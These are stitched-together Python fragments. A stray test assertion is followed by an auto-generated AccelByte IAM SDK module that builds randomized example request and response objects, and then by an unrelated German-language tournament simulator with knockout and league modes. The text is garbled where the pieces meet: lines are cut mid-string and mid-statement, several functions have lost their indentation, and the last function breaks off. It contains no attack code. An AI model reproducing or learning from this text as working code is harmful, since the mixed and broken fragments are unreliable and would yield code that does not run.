with self.assertRaisesRegex(RP2ValueError, "Parameter 'fiat_fee' has non-positive value | |
# Copyright (c) 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
#
# Code generated. DO NOT EDIT!
# template file: justice_py_sdk_codegen/__main__.py
# justice-iam-service (5.10.1)
# pylint: disable=duplicate-code
# pylint: disable=line-too-long
# pylint: disable=missing-function-docstring
# pylint: disable=missing-module-docstring
# pylint: disable=too-many-arguments
# pylint: disable=too-many-branches
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-lines
# pylint: disable=too-many-locals
# pylint: disable=too-many-public-methods
# pylint: disable=too-many-return-statements
# pylint: disable=too-many-statements
# pylint: disable=unused-import
from .utils import randomize
from ..api.iam.models import AccountCreateTestUserRequestV4
from ..api.iam.models import AccountCreateUserRequestV4
from ..api.iam.models import AccountCreateUserResponseV4
from ..api.iam.models import AccountUpgradeHeadlessAccountRequestV4
from ..api.iam.models import AccountUpgradeHeadlessAccountWithVerificationCodeRequestV4
from ..api.iam.models import AccountUserActiveBanResponseV4
from ..api.iam.models import AccountUserPermissionsResponseV4
from ..api.iam.models import AccountUserResponseV4
from ..api.iam.models import AccountcommonBan
from ..api.iam.models import AccountcommonBanReason
from ..api.iam.models import AccountcommonBanReasonV3
from ..api.iam.models import AccountcommonBanReasons
from ..api.iam.models import AccountcommonBanReasonsV3
from ..api.iam.models import AccountcommonBanV3
from ..api.iam.models import AccountcommonBannedByV3
from ..api.iam.models import AccountcommonBans
from ..api.iam.models import AccountcommonBansV3
from ..api.iam.models import AccountcommonClientPermission
from ..api.iam.models import AccountcommonClientPermissionV3
from ..api.iam.models import AccountcommonClientPermissions
from ..api.iam.models import AccountcommonClientPermissionsV3
from ..api.iam.models import AccountcommonConflictedUserPlatformAccounts
from ..api.iam.models import AccountcommonCountryAgeRestriction
from ..api.iam.models import AccountcommonDescription
from ..api.iam.models import AccountcommonDistinctLinkedPlatformV3
from ..api.iam.models import AccountcommonDistinctPlatformResponseV3
from ..api.iam.models import AccountcommonInputValidationDescription
from ..api.iam.models import AccountcommonJWTBanV3
from ..api.iam.models import AccountcommonListUsersWithPlatformAccountsResponse
from ..api.iam.models import AccountcommonNamespaceRole
from ..api.iam.models import AccountcommonNetflixCertificates
from ..api.iam.models import AccountcommonPagination
from ..api.iam.models import AccountcommonPaginationV3
from ..api.iam.models import AccountcommonPermission
from ..api.iam.models import AccountcommonPermissionV3
from ..api.iam.models import AccountcommonPermissions
from ..api.iam.models import AccountcommonPermissionsV3
from ..api.iam.models import AccountcommonPlatformAccount
from ..api.iam.models import AccountcommonRegisteredDomain
from ..api.iam.models import AccountcommonRole
from ..api.iam.models import AccountcommonRoleManager
from ..api.iam.models import AccountcommonRoleManagerV3
from ..api.iam.models import AccountcommonRoleMember
from ..api.iam.models import AccountcommonRoleMemberV3
from ..api.iam.models import AccountcommonRoleV3
from ..api.iam.models import AccountcommonSimpleUserPlatformInfoV3
from ..api.iam.models import AccountcommonUserLinkedPlatform
from ..api.iam.models import AccountcommonUserLinkedPlatformV3
from ..api.iam.models import AccountcommonUserLinkedPlatformsResponseV3
from ..api.iam.models import AccountcommonUserPlatformInfo
from ..api.iam.models import AccountcommonUserPlatforms
from ..api.iam.models import AccountcommonUserSearchByPlatformIDResult
from ..api.iam.models import AccountcommonUserSearchResult
from ..api.iam.models import AccountcommonUserWithLinkedPlatformAccounts
from ..api.iam.models import AccountcommonUserWithPlatformAccounts
from ..api.iam.models import BannedBy
from ..api.iam.models import BloomFilterJSON
from ..api.iam.models import ClientmodelClientCreateRequest
from ..api.iam.models import ClientmodelClientCreationResponse
from ..api.iam.models import ClientmodelClientCreationV3Request
from ..api.iam.models import ClientmodelClientResponse
from ..api.iam.models import ClientmodelClientUpdateRequest
from ..api.iam.models import ClientmodelClientUpdateSecretRequest
from ..api.iam.models import ClientmodelClientUpdateV3Request
from ..api.iam.models import ClientmodelClientV3Response
from ..api.iam.models import ClientmodelClientsV3Response
from ..api.iam.models import LegalAcceptedPoliciesRequest
from ..api.iam.models import ModelAddUserRoleV4Request
from ..api.iam.models import ModelAgeRestrictionRequest
from ..api.iam.models import ModelAgeRestrictionRequestV3
from ..api.iam.models import ModelAgeRestrictionResponse
from ..api.iam.models import ModelAgeRestrictionResponseV3
from ..api.iam.models import ModelAssignUserV4Request
from ..api.iam.models import ModelAssignedUserV4Response
from ..api.iam.models import ModelAuthenticatorKeyResponseV4
from ..api.iam.models import ModelBackupCodesResponseV4
from ..api.iam.models import ModelBanCreateRequest
from ..api.iam.models import ModelBanUpdateRequest
from ..api.iam.models import ModelCheckValidUserIDRequestV4
from ..api.iam.models import ModelCountry
from ..api.iam.models import ModelCountryAgeRestrictionRequest
from ..api.iam.models import ModelCountryAgeRestrictionV3Request
from ..api.iam.models import ModelCountryV3Response
from ..api.iam.models import ModelCreateJusticeUserResponse
from ..api.iam.models import ModelDisableUserRequest
from ..api.iam.models import ModelEmailUpdateRequestV4
from ..api.iam.models import ModelEnabledFactorsResponseV4
from ..api.iam.models import ModelForgotPasswordRequestV3
from ..api.iam.models import ModelGetAdminUsersResponse
from ..api.iam.models import ModelGetPublisherUserResponse
from ..api.iam.models import ModelGetUserBanV3Response
from ..api.iam.models import ModelGetUserJusticePlatformAccountResponse
from ..api.iam.models import ModelGetUserMapping
from ..api.iam.models import ModelGetUsersResponseWithPaginationV3
from ..api.iam.models import ModelInputValidationData
from ..api.iam.models import ModelInputValidationDataPublic
from ..api.iam.models import ModelInputValidationUpdatePayload
from ..api.iam.models import ModelInputValidationsPublicResponse
from ..api.iam.models import ModelInputValidationsResponse
from ..api.iam.models import ModelInviteUserRequestV3
from ..api.iam.models import ModelInviteUserRequestV4
from ..api.iam.models import ModelInviteUserResponseV3
from ..api.iam.models import ModelLinkPlatformAccountRequest
from ..api.iam.models import ModelLinkPlatformAccountWithProgressionRequest
from ..api.iam.models import ModelLinkRequest
from ..api.iam.models import ModelListAssignedUsersV4Response
from ..api.iam.models import ModelListBulkUserResponse
from ..api.iam.models import ModelListEmailAddressRequest
from ..api.iam.models import ModelListRoleV4Response
from ..api.iam.models import ModelListUserInformationResult
from ..api.iam.models import ModelListUserResponseV3
from ..api.iam.models import ModelListUserRolesV4Response
from ..api.iam.models import ModelListValidUserIDResponseV4
from ..api.iam.models import ModelLoginHistoriesResponse
from ..api.iam.models import ModelNamespaceRoleRequest
from ..api.iam.models import ModelPermissionDeleteRequest
from ..api.iam.models import ModelPlatformDomainDeleteRequest
from ..api.iam.models import ModelPlatformDomainResponse
from ..api.iam.models import ModelPlatformDomainUpdateRequest
from ..api.iam.models import ModelPlatformUserIDRequest
from ..api.iam.models import ModelPlatformUserInformation
from ..api.iam.models import ModelPublicThirdPartyPlatformInfo
from ..api.iam.models import ModelPublicUserInformationResponseV3
from ..api.iam.models import ModelPublicUserInformationV3
from ..api.iam.models import ModelPublicUserResponse
from ..api.iam.models import ModelPublicUserResponseV3
from ..api.iam.models import ModelPublicUsersResponse
from ..api.iam.models import ModelRemoveUserRoleV4Request
from ..api.iam.models import ModelResetPasswordRequest
from ..api.iam.models import ModelResetPasswordRequestV3
from ..api.iam.models import ModelRevokeUserV4Request
from ..api.iam.models import ModelRoleAdminStatusResponse
from ..api.iam.models import ModelRoleAdminStatusResponseV3
from ..api.iam.models import ModelRoleCreateRequest
from ..api.iam.models import ModelRoleCreateV3Request
from ..api.iam.models import ModelRoleManagersRequest
from ..api.iam.models import ModelRoleManagersRequestV3
from ..api.iam.models import ModelRoleManagersResponse
from ..api.iam.models import ModelRoleManagersResponsesV3
from ..api.iam.models import ModelRoleMembersRequest
from ..api.iam.models import ModelRoleMembersRequestV3
from ..api.iam.models import ModelRoleMembersResponse
from ..api.iam.models import ModelRoleMembersResponseV3
from ..api.iam.models import ModelRoleNamesResponseV3
from ..api.iam.models import ModelRoleResponse
from ..api.iam.models import ModelRoleResponseV3
from ..api.iam.models import ModelRoleResponseWithManagers
from ..api.iam.models import ModelRoleResponseWithManagersAndPaginationV3
from ..api.iam.models import ModelRoleResponseWithManagersV3
from ..api.iam.models import ModelRoleUpdateRequest
from ..api.iam.models import ModelRoleUpdateRequestV3
from ..api.iam.models import ModelRoleV4Request
from ..api.iam.models import ModelRoleV4Response
from ..api.iam.models import ModelSSOPlatformCredentialRequest
from ..api.iam.models import ModelSSOPlatformCredentialResponse
from ..api.iam.models import ModelSearchUsersByPlatformIDResponse
from ..api.iam.models import ModelSearchUsersResponse
from ..api.iam.models import ModelSearchUsersResponseWithPaginationV3
from ..api.iam.models import ModelSendRegisterVerificationCodeRequest
from ..api.iam.models import ModelSendVerificationCodeRequest
from ..api.iam.models import ModelSendVerificationCodeRequestV3
from ..api.iam.models import ModelThirdPartyLoginPlatformCredentialRequest
from ..api.iam.models import ModelThirdPartyLoginPlatformCredentialResponse
from ..api.iam.models import ModelUnlinkUserPlatformRequest
from ..api.iam.models import ModelUpdatePermissionScheduleRequest
from ..api.iam.models import ModelUpdateUserDeletionStatusRequest
from ..api.iam.models import ModelUpdateUserStatusRequest
from ..api.iam.models import ModelUpgradeHeadlessAccountRequest
from ..api.iam.models import ModelUpgradeHeadlessAccountV3Request
from ..api.iam.models import ModelUpgradeHeadlessAccountWithVerificationCodeRequest
from ..api.iam.models import ModelUpgradeHeadlessAccountWithVerificationCodeRequestV3
from ..api.iam.models import ModelUserActiveBanResponse
from ..api.iam.models import ModelUserActiveBanResponseV3
from ..api.iam.models import ModelUserBanResponse
from ..api.iam.models import ModelUserBanResponseV3
from ..api.iam.models import ModelUserBaseInfo
from ..api.iam.models import ModelUserCreateFromInvitationRequestV3
from ..api.iam.models import ModelUserCreateFromInvitationRequestV4
from ..api.iam.models import ModelUserCreateRequest
from ..api.iam.models import ModelUserCreateRequestV3
from ..api.iam.models import ModelUserCreateResponse
from ..api.iam.models import ModelUserCreateResponseV3
from ..api.iam.models import ModelUserDeletionStatusResponse
from ..api.iam.models import ModelUserIDsRequest
from ..api.iam.models import ModelUserInfoResponse
from ..api.iam.models import ModelUserInformation
from ..api.iam.models import ModelUserInvitationV3
from ..api.iam.models import ModelUserLoginHistoryResponse
from ..api.iam.models import ModelUserPasswordUpdateRequest
from ..api.iam.models import ModelUserPasswordUpdateV3Request
from ..api.iam.models import ModelUserPermissionsResponseV3
from ..api.iam.models import ModelUserResponse
from ..api.iam.models import ModelUserResponseV3
from ..api.iam.models import ModelUserRolesV4Response
from ..api.iam.models import ModelUserUpdateRequest
from ..api.iam.models import ModelUserUpdateRequestV3
from ..api.iam.models import ModelUserVerificationRequest
from ..api.iam.models import ModelUserVerificationRequestV3
from ..api.iam.models import ModelValidUserIDResponseV4
from ..api.iam.models import ModelValidationDetail
from ..api.iam.models import ModelValidationDetailPublic
from ..api.iam.models import ModelVerificationCodeResponse
from ..api.iam.models import ModelVerifyRegistrationCode
from ..api.iam.models import ModelWebLinkingResponse
from ..api.iam.models import OauthapiRevocationList
from ..api.iam.models import OauthcommonJWKKey
from ..api.iam.models import OauthcommonJWKSet
from ..api.iam.models import OauthcommonUserRevocationListRecord
from ..api.iam.models import OauthmodelCountryLocationResponse
from ..api.iam.models import OauthmodelErrorResponse
from ..api.iam.models import OauthmodelTokenIntrospectResponse
from ..api.iam.models import OauthmodelTokenResponse
from ..api.iam.models import OauthmodelTokenResponseV3
from ..api.iam.models import OauthmodelTokenThirdPartyResponse
from ..api.iam.models import RestErrorResponse
from ..api.iam.models import RestapiErrorResponse
from ..api.iam.models import Validation
from ..api.iam.models import ValidationDescription
def create_account_create_test_user_request_v4_example() -> AccountCreateTestUserRequestV4:
    """Build an AccountCreateTestUserRequestV4 populated with randomized example values."""
    example = AccountCreateTestUserRequestV4()
    example.auth_type = randomize()
    example.country = randomize("country")
    example.date_of_birth = randomize()
    example.display_name = randomize("slug")
    example.email_address = randomize("email")
    example.password = randomize("password")
    example.password_md5_sum = randomize()
    example.username = randomize("slug")
    example.verified = randomize("bool")
    example.accepted_policies = [create_legal_accepted_policies_request_example()]
    return example


def create_account_create_user_request_v4_example() -> AccountCreateUserRequestV4:
    """Build an AccountCreateUserRequestV4 populated with randomized example values."""
    example = AccountCreateUserRequestV4()
    example.auth_type = randomize()
    example.code = randomize()
    example.country = randomize("country")
    example.display_name = randomize("slug")
    example.email_address = randomize("email")
    example.password = randomize("password")
    example.password_md5_sum = randomize()
    example.reach_minimum_age = randomize("bool")
    example.username = randomize("slug")
    example.accepted_policies = [create_legal_accepted_policies_request_example()]
    example.date_of_birth = randomize()
    return example
def create_account_create_user_response_v4_example() -> AccountCreateUserResponseV4:
    """Build an AccountCreateUserResponseV4 populated with randomized example values."""
    example = AccountCreateUserResponseV4()
    example.auth_type = randomize()
    example.country = randomize("country")
    example.date_of_birth = randomize("adult_birthdate")
    example.display_name = randomize("slug")
    example.email_address = randomize("email")
    example.namespace = randomize("slug")
    example.user_id = randomize("uid")
    example.username = randomize("slug")
    return example


def create_account_upgrade_headless_account_request_v4_example() -> AccountUpgradeHeadlessAccountRequestV4:
    """Build an AccountUpgradeHeadlessAccountRequestV4 populated with randomized example values."""
    example = AccountUpgradeHeadlessAccountRequestV4()
    example.email_address = randomize("email")
    example.password = randomize("password")
    example.username = randomize("slug")
    return example


def create_account_upgrade_headless_account_with_verification_code_request_v4_example() -> AccountUpgradeHeadlessAccountWithVerificationCodeRequestV4:
    """Build an AccountUpgradeHeadlessAccountWithVerificationCodeRequestV4 populated with randomized example values."""
    example = AccountUpgradeHeadlessAccountWithVerificationCodeRequestV4()
    example.code = randomize()
    example.email_address = randomize("email")
    example.password = randomize("password")
    example.reach_minimum_age = randomize("bool")
    example.username = randomize("slug")
    example.validate_only = randomize("bool")
    example.country = randomize("country")
    example.date_of_birth = randomize()
    example.display_name = randomize("slug")
    return example
def create_account_user_active_ban_response_v4_example() -> AccountUserActiveBanResponseV4:
    """Build an AccountUserActiveBanResponseV4 populated with randomized example values."""
    example = AccountUserActiveBanResponseV4()
    example.ban = randomize()
    example.ban_id = randomize()
    example.end_date = randomize("date")
    return example


def create_account_user_permissions_response_v4_example() -> AccountUserPermissionsResponseV4:
    """Build an AccountUserPermissionsResponseV4 populated with randomized example values."""
    example = AccountUserPermissionsResponseV4()
    example.action = randomize("int", min_val=1, max_val=1000)
    example.resource = randomize()
    example.sched_action = randomize("int", min_val=1, max_val=1000)
    example.sched_cron = randomize()
    example.sched_range = [randomize()]
    return example


def create_account_user_response_v4_example() -> AccountUserResponseV4:
    """Build an AccountUserResponseV4 populated with randomized example values."""
    example = AccountUserResponseV4()
    example.auth_type = randomize()
    example.bans = [create_account_user_active_ban_response_v4_example()]
    example.country = randomize("country")
    example.created_at = randomize("date")
    example.date_of_birth = randomize("adult_birthdate")
    example.deletion_status = randomize("bool")
    example.display_name = randomize("slug")
    example.email_address = randomize("email")
    example.email_verified = randomize("bool")
    example.enabled = randomize("bool")
    example.last_date_of_birth_changed_time = randomize("date")
    example.last_enabled_changed_time = randomize("date")
    example.namespace = randomize("slug")
    example.old_email_address = randomize()
    example.permissions = [create_account_user_permissions_response_v4_example()]
    example.phone_verified = randomize("bool")
    example.roles = [randomize()]
    example.user_id = randomize("uid")
    example.new_email_address = randomize()
    example.phone_number = randomize()
    example.platform_id = randomize()
    example.platform_user_id = randomize()
    example.username = randomize("slug")
    return example
def create_accountcommon_ban_example() -> AccountcommonBan:
    """Build an AccountcommonBan populated with randomized example values."""
    example = AccountcommonBan()
    example.ban = randomize()
    example.description = randomize()
    return example


def create_accountcommon_ban_reason_example() -> AccountcommonBanReason:
    """Build an AccountcommonBanReason populated with randomized example values."""
    example = AccountcommonBanReason()
    example.description = randomize()
    example.reason = randomize()
    return example


def create_accountcommon_ban_reason_v3_example() -> AccountcommonBanReasonV3:
    """Build an AccountcommonBanReasonV3 populated with randomized example values."""
    example = AccountcommonBanReasonV3()
    example.description = randomize()
    example.reason = randomize()
    return example


def create_accountcommon_ban_reasons_example() -> AccountcommonBanReasons:
    """Build an AccountcommonBanReasons wrapping one randomized ban reason."""
    example = AccountcommonBanReasons()
    example.reasons = [create_accountcommon_ban_reason_example()]
    return example


def create_accountcommon_ban_reasons_v3_example() -> AccountcommonBanReasonsV3:
    """Build an AccountcommonBanReasonsV3 wrapping one randomized ban reason."""
    example = AccountcommonBanReasonsV3()
    example.reasons = [create_accountcommon_ban_reason_v3_example()]
    return example
def create_accountcommon_ban_v3_example() -> AccountcommonBanV3:
    """Build an AccountcommonBanV3 populated with randomized example values."""
    example = AccountcommonBanV3()
    example.ban = randomize()
    example.type_ = randomize()
    example.description = randomize()
    example.descriptions = create_accountcommon_description_example()
    return example


def create_accountcommon_banned_by_v3_example() -> AccountcommonBannedByV3:
    """Build an AccountcommonBannedByV3 populated with randomized example values."""
    example = AccountcommonBannedByV3()
    example.display_name = randomize("slug")
    example.user_id = randomize("uid")
    return example


def create_accountcommon_bans_example() -> AccountcommonBans:
    """Build an AccountcommonBans wrapping one randomized ban."""
    example = AccountcommonBans()
    example.bans = [create_accountcommon_ban_example()]
    return example


def create_accountcommon_bans_v3_example() -> AccountcommonBansV3:
    """Build an AccountcommonBansV3 wrapping one randomized ban."""
    example = AccountcommonBansV3()
    example.bans = [create_accountcommon_ban_v3_example()]
    return example
def create_accountcommon_client_permission_example() -> AccountcommonClientPermission:
    """Build an AccountcommonClientPermission populated with randomized example values."""
    example = AccountcommonClientPermission()
    example.action = randomize("int", min_val=1, max_val=1000)
    example.resource = randomize()
    return example


def create_accountcommon_client_permission_v3_example() -> AccountcommonClientPermissionV3:
    """Build an AccountcommonClientPermissionV3 populated with randomized example values."""
    example = AccountcommonClientPermissionV3()
    example.action = randomize("int", min_val=1, max_val=1000)
    example.resource = randomize()
    return example


def create_accountcommon_client_permissions_example() -> AccountcommonClientPermissions:
    """Build an AccountcommonClientPermissions wrapping one randomized permission."""
    example = AccountcommonClientPermissions()
    example.permissions = [create_accountcommon_client_permission_example()]
    return example


def create_accountcommon_client_permissions_v3_example() -> AccountcommonClientPermissionsV3:
    """Build an AccountcommonClientPermissionsV3 wrapping one randomized permission."""
    example = AccountcommonClientPermissionsV3()
    example.permissions = [create_accountcommon_client_permission_v3_example()]
    return example
def create_accountcommon_conflicted_user_platform_accounts_example() -> AccountcommonConflictedUserPlatformAccounts:
instance = AccountcommonConflictedUserPlatformAccounts()
instance.platform_user_id = randomize()
instance.publisher_accounts = [create_accountcommon_user_with_linked_platform_accounts_example()]
return instance
def create_accountcommon_country_age_restriction_example() -> AccountcommonCountryAgeRestriction:
instance = AccountcommonCountryAgeRestriction()
instance.age_restriction = randomize("int", min_val=1, max_val=1000)
instance.country_code = randomize()
instance.country_name = randomize()
instance.enable = randomize("bool")
return instance
def create_accountcommon_description_example() -> AccountcommonDescription:
    """Build an AccountcommonDescription with randomized locale strings."""
    example = AccountcommonDescription()
    example.zh_cn = randomize()
    example.en_us = randomize()
    return example
def create_accountcommon_distinct_linked_platform_v3_example() -> AccountcommonDistinctLinkedPlatformV3:
    """Build an AccountcommonDistinctLinkedPlatformV3 with example data."""
    example = AccountcommonDistinctLinkedPlatformV3()
    example.platform_user_id = randomize()
    example.platform_name = randomize()
    example.linked_at = randomize()
    example.details = [create_accountcommon_simple_user_platform_info_v3_example()]
    return example
def create_accountcommon_distinct_platform_response_v3_example() -> AccountcommonDistinctPlatformResponseV3:
    """Build an AccountcommonDistinctPlatformResponseV3 holding one example platform."""
    example = AccountcommonDistinctPlatformResponseV3()
    example.platforms = [create_accountcommon_distinct_linked_platform_v3_example()]
    return example
def create_accountcommon_input_validation_description_example() -> AccountcommonInputValidationDescription:
    """Build an AccountcommonInputValidationDescription with randomized fields."""
    example = AccountcommonInputValidationDescription()
    example.message = [randomize()]
    example.language = randomize()
    return example
def create_accountcommon_jwt_ban_v3_example() -> AccountcommonJWTBanV3:
instance = AccountcommonJWTBanV3()
instance.ban = | |
from glob import glob
import random
from statistics import mode
import sys
def ko(dataarray, name):
    """Run an interactive single-elimination (KO) tournament on the console.

    Args:
        dataarray: list whose first element is the player count; the remaining
            elements are the players' power values (strings convertible to int).
            NOTE: the count element is popped, so the caller's list is mutated.
        name: label of the data source; currently unused in this function.

    Side effects: reads from stdin (schedule choice, manual pairings), prints
    all progress/results, and may call sys.exit(0) if the user aborts.
    NOTE(review): the round-halving logic assumes the (even) field reduces
    cleanly; non-power-of-two counts leave an odd group count — TODO confirm.
    """
    playeramount = int(dataarray.pop(0))
    playerlist = dataarray
    # A KO bracket needs an even field: drop one random player, or abort.
    if playeramount % 2 == 1:
        print("Deine Spielerzahl ist leider ungerade somit geht das KO System nicht auf")
        ask = input("Es wird nun ein Spieler zufällig disqualifiziert\n Falls du das nicht willst schreibe (n) \nIn dem Fall wenn du n eingibst musst du entweder vor dem Neustart deine Spieleranzahl in eine gerade Zahl umwandeln oder das Liga System verwenden.")
        if ask == "n" or ask == "N":
            sys.exit(0)
        else:
            rdmn = random.randint(0, playeramount - 1)
            playerlist.pop(rdmn)
            playeramount = playeramount - 1
    loop = True
    print(playerlist[0])
    # Ask for one of the three first-round scheduling modes until a valid
    # choice is made.
    while loop:
        try:
            tournament_schedule = int(input("Welchen Tunierplan möchtest du benutzen durchnumerriert nach der Ordnung der Textdatei(1), zufällig (2), manuell (3)"))
        except ValueError:
            print("Dein Input leider keine ganze Zahl")
            # BUGFIX: without this continue, tournament_schedule was unbound
            # below and the first invalid input raised a NameError.
            continue
        if tournament_schedule == 1:
            # Mode 1: pair players in file order -> (0,1), (2,3), ...
            loop = False
            round1plan = {}
            playeramount_half = int(playeramount / 2)
            for i in range(1, playeramount_half + 1):
                print(i)
                x = (i - 1) * 2
                round1plan["group{0}".format(i)] = x, x + 1
            print(round1plan)
            print("Der Turierplan wird nach der Ordnung der Textdatei erstellt")
        elif tournament_schedule == 2:
            # Mode 2: shuffle the players, then pair them off in the
            # shuffled order.
            loop = False
            round1plan = {}
            playeramount_half = int(playeramount / 2)
            check = []
            player_order = []
            # BUGFIX: was range(0, playeramount - 1), which silently left the
            # last player out of the shuffle and duplicated others in groups.
            for i in range(0, playeramount):
                check.append(i)
            print(check)
            # Rejection-sample a random permutation: draw until every index
            # has been removed from `check` exactly once.
            while len(check) != 0:
                random_number = random.randint(0, playeramount - 1)
                try:
                    check.remove(random_number)
                except ValueError:
                    continue
                player_order.append(random_number)
            print(player_order)
            for i in range(0, playeramount_half):
                # BUGFIX: was x = (i - 1) * 2, which paired group 1 with the
                # *last* two entries via negative indices.
                x = i * 2
                round1plan["group{0}".format(i + 1)] = player_order[x], player_order[x + 1]
            print("Der Turnierplan wurde zufällig erstellt")
            print(round1plan)
        elif tournament_schedule == 3:
            # Mode 3: the user types both players of every group by hand;
            # 1-based input is converted to 0-based indices.
            loop = False
            round1plan = {}
            playeramount_half = int(playeramount / 2)
            check = []  # player numbers already assigned to some group
            print(playeramount_half)
            for i in range(0, playeramount_half):
                checker = True
                while checker:
                    checker = False
                    i_plus = i + 1
                    try:
                        player1 = int(input("Erster Spieler der Gruppe" + str(i_plus) + "\n:"))
                    except ValueError:
                        print("Deine Eingabe ist leider keine Ganze Zahl vom Typ (Integer)")
                        checker = True
                        continue
                    try:
                        player2 = int(input("Zweiter Spieler der Gruppe" + str(i_plus) + "\n:"))
                    except ValueError:
                        print("Deine Eingabe ist leider keine Ganze Zahl vom Typ (Integer)")
                        checker = True
                        continue
                    for x in check:
                        print("Check wird durchgeführt")
                        if x == player1:
                            print("Du hast leider Spieler", player1, " schon zugewiesen\nBitte wähle einen anderen Spieler für den ersten Spieler der Gruppe" + str(i_plus))
                            checker = True
                            continue
                        if x == player2:
                            print("Du hast leider Spieler", player2, " schon zugewiesen\nBitte wähle einen anderen Spieler für den ersten Spieler der Gruppe" + str(i_plus))
                            checker = True
                            continue
                    # BUGFIX: only record the pairing when the duplicate check
                    # passed; previously duplicates were appended anyway.
                    if checker:
                        continue
                    check.append(player1)
                    check.append(player2)
                    round1plan["group{0}".format(i + 1)] = player1 - 1, player2 - 1
                    print(check)
            print(round1plan)
        else:
            print("Bitte gebe einen zahl zwischen 1 und 3 ein")
    # Simulate the bracket round by round until one group remains.
    round3plan = {}
    round3list = []
    playeramount_loop = playeramount_half
    print(playeramount_loop)
    round2plan = round1plan
    print(round2plan)
    while playeramount_loop / 2 >= 1 or playeramount_loop == 1:
        if playeramount_loop == 1:
            # Final round: one group left; decide the winner and stop.
            print("Finale Runde")
            print(round2plan)
            players = round2plan["group" + str(1)]
            playerone = players[0]
            playertwo = players[1]
            playerone_power = int(playerlist[playerone])
            playertwo_power = int(playerlist[playertwo])
            # Weighted coin flip: win chance proportional to player power.
            random_number = random.randint(1, playerone_power + playertwo_power)
            print(random_number)
            if 0 <= random_number <= playerone_power:
                print("Spieler " + str(playerone) + " hat gewonnen mit einer Power von " + str(playerone_power))
            else:
                print("Spieler " + str(playertwo) + " hat gewonnen mit einer Power von " + str(playertwo_power))
            break
        # Play every group of the current round; winners go to round3list.
        for i in range(1, playeramount_loop + 1):
            players = round2plan["group" + str(i)]
            print(players)
            playerone = players[0]
            playertwo = players[1]
            playerone_power = int(playerlist[playerone])
            playertwo_power = int(playerlist[playertwo])
            random_number = random.randint(1, playerone_power + playertwo_power)
            if 0 <= random_number <= playerone_power:
                print("Spieler 1 hat gewonnen")
                round3list.append(playerone)
            else:
                print("Spieler 2 hat gewonnen")
                round3list.append(playertwo)
            print(playerone)
            print(playerone_power)
            print(playertwo)
            print(playertwo_power)
        print("liste", round3list)
        # Re-pair the winners into the next (half-sized) round.
        xy = int(playeramount_loop / 2)
        for x in range(1, xy + 1):
            y = (x - 1) * 2
            round3plan["group{0}".format(x)] = round3list[y], round3list[y + 1]
        round3list = []
        print(round3plan)
        round2plan = round3plan
        round3plan = {}
        playeramount_loop = int(playeramount_loop / 2)
        print(playeramount_loop)
def liga(dataarray, name):
    """Run an interactive round-robin ("Liga") tournament on the console.

    Every player plays every other player once; each match is a weighted coin
    flip proportional to the two players' power values. Ties at the top are
    resolved interactively (multiple winners, or a KO playoff via ko()).

    Args:
        dataarray: list whose first element is the player count; the remaining
            elements are the players' power values (strings convertible to
            int). NOTE: the count element is popped, so the list is mutated.
        name: label of the data source, used only in the start banner.

    Side effects: prints all progress/results and may read from stdin.
    """
    playeramount = int(dataarray.pop(0))
    print("\n" + "Starte Liga mit der Datei " + name)
    playerlist = dataarray
    print(playeramount)
    print(playerlist)
    wins = playeramount * [0]
    print(wins)
    print(wins)
    # Round robin: every pair (i, x) with x > i plays exactly once.
    for i in range(0, playeramount - 1):
        print("\n")
        print("spieler" + str(i))
        print(playerlist[i])
        print("\n")
        powerplayeri = int(playerlist[i])
        for x in range(i + 1, playeramount):
            print("spieler" + str(x))
            print(playerlist[x])
            powerplayerx = int(playerlist[x])
            # Weighted coin flip proportional to the two power values.
            random_number = random.randint(0, powerplayeri + powerplayerx)
            print("Zufallszahl" + str(random_number))
            if 0 <= random_number <= powerplayeri:
                print("Spieler" + str(i) + "hat gewonnen")
                wins[i] = wins[i] + 1
            else:
                print("Spieler" + str(x) + "hat gewonnen")
                wins[x] = wins[x] + 1
    print("Die Ergebnisse stehen fest ", wins)
    print("Länge siege", len(wins))
    print("Array wins ", wins)
    # IDIOM: 'max' shadowed the builtin and was recomputed by hand.
    max_wins = max(wins)
    print("Die größte Anzahl an Siegen ist ", max_wins)
    # Collect every player that reached the top score (there may be ties).
    winner_arr_power = []
    winner_arr_index = []
    for i in range(0, len(wins)):
        if wins[i] == max_wins:
            winner_arr_index.append(i)
    for i in winner_arr_index:
        winner_arr_power.append(playerlist[i])
    print(winner_arr_index)
    print(winner_arr_power)
    length_winner_power = len(winner_arr_power)
    if length_winner_power > 1:
        print("Es gibt mehrere Gewinner und zwar ", length_winner_power)
        ask = str(input("Was möchtest du machen? Soll es mehrere Gewinner geben dann skipe mit (skip)\nOder möchtest du ein KO zwischen den Spielern mit den meisten siegen (ko)\n:"))
        if ask == "skip":
            for i in range(0, length_winner_power):
                print("Spieler" + str(winner_arr_index[i]) + " hat gewonnen mit einer Angriffstärke von " + str(winner_arr_power[i]))
        elif ask == "ko":
            print("Das KO System wird aufgerufen......")
            if length_winner_power % 2 == 1:
                print("Die Anzahl an Spielern ist ungrade wir müssen leider einen disqualifizieren")
                print("Dies wird zufällig entschieden")
                rdmn = random.randint(0, length_winner_power - 1)
                winner_arr_power.pop(rdmn)
                # BUGFIX: keep the index list in sync with the power list,
                # otherwise the player mapping printed below is wrong.
                winner_arr_index.pop(rdmn)
            param = "Finale"
            players = len(winner_arr_power)
            for i in range(0, len(winner_arr_index)):
                print("Spieler" + str(winner_arr_index[i]) + " wird als Spieler" + str(i) + " antreten.")
            # ko() expects the player count as the first list element.
            winner_arr_power.insert(0, players)
            ko(winner_arr_power, param)
        else:
            print("Ungültige Eingabe gebe bitte (skip) oder (ko) ein")
    else:
        index = wins.index(max_wins)
        print("Der Index ist", index)
        winner = playerlist[index]
        print("Spieler" + str(index) + " hat gewonnen mit einer Angriffstärke von " + winner)
def read_from_file(filename):
    """Read *filename* and return its contents split on newline characters.

    Note: like str.split('\\n'), a trailing newline in the file yields a
    final empty string in the returned list.
    """
    # BUGFIX: use a context manager so the handle is closed instead of
    # leaked; the element-by-element copy of the split list was redundant.
    with open(filename, "r") as handle:
        return handle.read().split('\n')
def ko5(dataarray, name, skip):
winnerlist = []
playeramount = int(dataarray.pop(0))
playerlist = dataarray
if playeramount % 2 == 1:
print("Deine Spielerzahl ist leider ungerade somit geht das KO System nicht auf")
